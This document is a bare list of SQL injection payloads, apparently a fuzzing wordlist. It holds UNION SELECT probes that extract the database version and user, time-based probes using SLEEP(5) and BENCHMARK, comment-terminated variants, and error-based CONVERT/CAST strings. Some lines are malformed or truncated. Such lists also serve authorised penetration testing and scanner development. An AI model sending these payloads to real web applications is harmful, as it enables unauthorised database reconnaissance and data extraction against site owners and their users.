 UNION ALL SELECT 1
 UNION SELECT @@VERSION,SLEEP(5),3
 UNION SELECT @@VERSION,SLEEP(5),USER(),4
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
 UNION SELECT @@VERSION,SLEEP(5),"'3
 UNION SELECT @@VERSION,SLEEP(5),"'3'"#
 UNION SELECT @@VERSION,SLEEP(5),USER(),4#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A'))
 UNION ALL SELECT USER()--
 UNION ALL SELECT SLEEP(5)--
 UNION ALL SELECT USER(),SLEEP(5)--
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))
 UNION ALL SELECT NULL--
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
 UNION ALL SELECT NULL#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)
 UNION ALL SELECT NULL
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
 AND 3516=CAST
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'